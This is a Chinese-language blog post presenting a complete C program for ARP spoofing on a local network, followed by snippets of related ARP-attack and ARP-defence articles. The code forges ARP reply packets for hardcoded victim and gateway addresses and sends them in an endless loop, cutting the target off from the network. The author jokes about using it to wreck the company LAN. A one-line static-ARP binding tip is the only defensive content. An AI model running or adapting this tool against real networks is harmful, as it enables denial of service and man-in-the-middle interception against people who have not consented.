简单的arp攻击

最新推荐文章于 2025-05-15 10:40:01 发布
最新推荐文章于 2025-05-15 10:40:01 发布
阅读量377 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: linux 网络协议 文章标签: J# XP Socket GCC
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/dalaoshu/article/details/83442877
由于本人很菜,这个代码是改别人的.呵呵.可以在公司的局域网里搞搞坏,呵呵.
我是在ubuntu8.04下的,需要gcc编译.


#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <signal.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/ip_icmp.h>
#include <linux/if_ether.h>

void die(char *str) {
fprintf(stderr,"%s\n", str);
exit(1);
}

typedef struct {
//以太网首部
u_char targ_hw_addr[6]; //广播mac地址
u_char src_hw_addr[6]; //源mac地址
u_short frame_type; //帧类型

//28字节arp请求 应答
u_short hw_type; //硬件类型
u_short prot_type; //协议类型
u_char hw_addr_size; //硬件地址长度
u_char prot_addr_size; //协议地址长度
u_short op; //操作类型
u_char sndr_hw_addr[6]; //发送端源mac地址
u_char sndr_ip_addr[4]; //发送端源ip地址
u_char rcpt_hw_addr[6]; //目的mac地址
u_char rcpt_ip_addr[4]; //目的ip地址
u_char padding[18];
} ARP_PACKET;

ARP_PACKET createPacket(char bro_hw[]) {
int size, j;
ARP_PACKET arppacket;

size = 42;
bzero(&arppacket, size);

//dec_hw 发给攻击目标的 ip mac 映射 被攻击者的arp映射表会被改掉 如果这个ip是被攻击者网关他就上不了网了
//xp下执行 例如: arp -s 192.168.0.4 00-14-78-81-47-7f 就可以绑定mac地址了。
char dec_hw[] = { 0x00, 0x1d, 0x7d, 0x45, 0x1c, 0x11 };//mac
char dec_ip[] = { 0xc0, 0xa8, 0x00, 0x04 };//192.168.0.4


//src_hw 假冒这个人 ip mac
char src_hw[] = { 0x00, 0x1d, 0x7d, 0x45, 0x1c, 0x11 };//mac
char src_ip[] = { 0xc0, 0xa8, 0x00, 0x04 }; //192.168.0.4

arppacket.op = htons(0x0002); //操作类型 OP_ARP_QUEST 1 OP_ARP_REQUEST 2

//----------------------------------------------------
//以太网首部
printf("1.广播mac地址\r\n");
for (j = 0; j < 6; j++) {
arppacket.targ_hw_addr[j] = bro_hw[j];
}

printf("2.源mac地址\r\n");
for (j = 0; j < 6; j++) {
arppacket.src_hw_addr[j] = src_hw[j];
}

printf("3.帧类型 ARP_FRAME_TYPE\r\n");
arppacket.frame_type = htons(0x0806);
//----------------------------------------------------
//28字节
printf("4.arp请求 应答\r\n");
arppacket.hw_type = htons(0x0001); //硬件类型
arppacket.prot_type = htons(0x0800); //协议类型
arppacket.hw_addr_size = 6; //硬件地址长度
arppacket.prot_addr_size = 4; //协议地址长度

printf("发送端源mac地址\r\n");
for (j = 0; j < 6; j++) {
arppacket.sndr_hw_addr[j] = src_hw[j];
}

printf("目的mac地址\r\n");
for (j = 0; j < 6; j++) {
arppacket.rcpt_hw_addr[j] = dec_hw[j];
}

printf("发送端源ip地址\r\n");
for (j = 0; j < 4; j++) {
arppacket.sndr_ip_addr[j] = src_ip[j];
}

printf("目的ip地址\r\n");
for (j = 0; j < 4; j++) {
arppacket.rcpt_ip_addr[j] = dec_ip[j];
}

printf("padding\r\n");
bzero(arppacket.padding, 18);

printf("start send\r\n");

return arppacket;
}

int main(int argc, char * argv[]) {
int sock, size, bytes_send;
struct sockaddr sin;
strcpy(sin.sa_data, "eth2");
//bro_hw 攻击目标的mac地址
// char bro_hw[] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff };//所有
char bro_hw[] = { 0x00, 0x1D, 0x7D, 0xC9, 0x28, 0x31 };//

ARP_PACKET arppacket = createPacket(bro_hw);
// ARP_PACKET arppacket2 = createPacket(bro_hw2);

sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_RARP));
if (sock < 0) {
printf("create socket error!\r\n");
exit(1);
} else {
printf("create socket!\r\n");
}

while (1) {
bytes_send = sendto(sock, &arppacket, sizeof(arppacket), 0, &sin, sizeof(sin));
// bytes_send = sendto(sock, &arppacket2, sizeof(arppacket2), 0, &sin, sizeof(sin));
sleep(1);
}
printf("end send\r\n");
return 0;
}

防止arp攻击,绑定mac
在xp下用命令:arp -s 192.168.0.4 00-14-78-81-47-7f就可以绑定mac地址了。
简单ARP欺骗攻击
qq_51461656的博客
01-31 511
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录(一)、ARP协议简介(二)、ARP原理简介(三)、执行攻击(四)、攻击有效范围(五)、若遭攻击怎末办? (一)、ARP协议简介 ARP是 Address Resolution Protocol (地址解析协议)的缩写。在以太网中,两台主机想要通信,就必须要知道目标主机的MAC(Medium/Media Access Control,介质访问控制)地址,如何获取目标主机的MAC地址呢?这就是地址解析协议ARP的工作。地址解析协议的
python实现arp攻击_Python scapy 实现一个简易 arp 攻击脚本
weixin_32848231的博客
01-14 1083
scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。scapy的安装在Linux非常便利,但在Windows下比较复杂。以下假定读者使用的是Ubuntu Linux 和 Python 3 环境。scapy的安装在Linux下非常便利,在终端下执行以下命令即可完成安装:sudo pip3 install scapy-py...
python之最简单实现arp攻击
05-30
原来我实现的时候都写了一大堆,今天想到了最简单实现的方法,分享给大家
ARP攻击简单介绍-ielab
IE-lab网络实验室的博客
07-30 534
ARP协议是以太网等数据链路层的基础协议,负责完成IP地址到硬件地址的映射。工作过程简述如下: 1、当主机或者网络设备需要解析一个IP地址对应的MAC地址时,会广播发送ARP请求报文。 2、主机或者网络设备接收到ARP请求后,会进行应答。同时,根据请求发送者的IP地址和MAC地址的对应关系建立ARP表项。 3、发起请求的主机或者网络设备接收到应答后,同样会将应答报文中发送者的IP地址和MAC地址的...
ARP欺骗攻击实操
最新发布
wly55690的博客
05-15 753
本篇是在学习第一阶段理论知识的最后一节课的实战操作,其中讲到了两种欺骗操作,这是其一,另一种是DNS欺骗操作,看自己有时间进行操作了ARP欺骗(英语:ARP spoofing),又称 ARP毒化 (ARP poisoning,网上上多译为ARP病毒)或ARP攻击,是针对 以太网地址解析协议 ( ARP )的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。
简易arp攻击^_^
bluecomputer的专栏
09-08 441
 今天搞了一次简易的arp攻击,将过程记录如下将libnet_write()函数写如一个while的死循环里面通过这这样,就可以不断发送构造的arp包,寝室一哥们不幸成了我的实验对象,我将目标ip和mac地址填成他的,然后不不断的发送arp回应包,看了下试验结果,搞的他看魔兽视频卡的要命,并且连机器运行都突然变的好卡!直到他重新换了ip地址后,问题才解决
ARP攻击及原理
weixin_33890526的博客
11-14 256
【故障原因】 局域网内有人使用ARP欺骗的木马程序(比如:传奇盗号的软件,某些传奇外挂中也被恶意加载了此程序)。 【故障原理】 要了解故障原理,我们先来了解一下ARP协议。 在局域网中,通过ARP协议来完成IP地址转换为第二层物理地址(即MAC地址)的。ARP协议对网络安全具有重要的意义。通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞。 ARP协议是“Ad...
ArpShield:NetRobocop打造的简易ARP攻击防御工具
此外,描述中提到使用了NDIS(网络驱动接口规范)来实现其功能,这意味着ArpShield是在网络层面上进行了深入的操作,直接与网络驱动交互,以实现对ARP攻击的检测和防御。 ### 标签知识点 标签部分列出了“Arp Anti...
简单实现ARP攻击
weixin_65225676的博客
10-16 763
现在开始使用arpspoof命令:arpspoof -i eth0 -t 192.168.178.174(目标的ip) 192.168.178.150(网关)现在在物理机上ping www.baidu.com 证明此时网络是通畅的。检查物理机与虚拟机的网卡名称、ip地址、MAC地址。可以看到此时网关是 192.168.178.150。此次攻击到到此结束了 一个很简单的小攻击。将他们ping一下 看通信是否正常。此时再ping百度 已经不超过了。用arp -a(物理机) 命令。现在已经ping成功了。
ARP攻击的原理和实现 (网络安全)
2402_86725606的博客
01-04 1524
ARP攻击利用了ARP协议本身的缺陷,即没有身份验证机制,允许攻击者伪造ARP响应,进行中间人攻击、流量劫持和拒绝服务等恶意行为。为了防止ARP攻击,网络管理员应采取措施,如启用动态ARP检查、使用静态ARP表、部署加密协议和IDS等,以增强网络的安全性。
ARP攻击脚本
qq_43801002的博客
04-26 570
PS:仅做个人学习用途! import os import re import time from scapy.all import * from threading import Thread #定义变量函数 gw='' wifi="Realtek PCIe GbE Family Controller #2" #扫描局域网,显示活跃主机 def scan(): global gw...
防御arp攻击的一个脚本
03-25
arp 防御的一个小脚本、需要和路由上的静态路由表一起使用
ARP攻击
qq_44418229的博客
04-05 3972
1.ARP协议原理讲解 什么是ARP ARP就是地址解析协议,是根据IP地址获取物理地址的一个TCP/IP协议 工作原理 ARP协议规定,每台计算机都需要一个ARP表,用来保存IP和MAC地址的映射关系 当访问IP地址的时候就去查ARP表,从而找到对应的MAC地址 如果ARP表匹配不到,就会使用广播的方式发送一个ARP请求,目标主机收到请求后会使用单播的方式返回一个ARP响应,告知自己的MAC地址 请求的主机拿到MAC地址后,会将映射关系缓存到ARP表,而后传递到数据链路层进行协议转化...
使用 Scapy 库编写 ARP 欺骗攻击脚本
Flag少侠的博客
03-26 2718
ARP(Address Resolution Protocol)缓存中毒是一种网络攻击,它利用了ARP协议中的漏洞,通过欺骗或篡改网络中的ARP缓存来实施攻击ARP协议是用于将IP地址映射到物理MAC地址的协议,在IPv4网络中,每台计算机都有一个ARP缓存,用于保存IP地址到MAC地址的映射关系,以便进行网络通信。
linux下防止ARP攻击的shell脚本
临海的博客
02-09 948
防止ARP攻击的shell脚本,使用命令route、grep、ifconfig等,需要的朋友可以参考下就不废话了,直接上代码了。 #!/bin/bash declare gw=`route -n | grep -e '^0.0.0.0'` declare gwname=`echo $gw | grep -oe '\w*$'` declare gwip=`echo $gw | grep -oe '...
防止arp攻击的批处理语句
yulongsheng123的专栏
02-18 546
通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。 本文介绍了四种利用自制批处理文件来防御ARP攻击的方法。
python编写ARP拒绝服务攻击脚本
YeD666的博客
03-25 2736
python编写拒绝服务攻击脚本
ARP攻击技术
lmix___的博客
07-06 719
ARP协议:IP地址是主机在网络层中的地址。数据链路层是不能够识别IP地址的,但网卡、交换机等都工作在数据链路层,所以如果想要将网络层中的数据包交给目的主机,必须要在数据链路层封装为有MAC地址的帧后才能发送。但是32bit的IP地址和48bit的MAC地址之间没有简单的映射关系。ARP协议就是将某个IP地址解析为对应的MAC地址的协议。 每个主机都设有一个ARP高速缓存,存放局域网中主...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值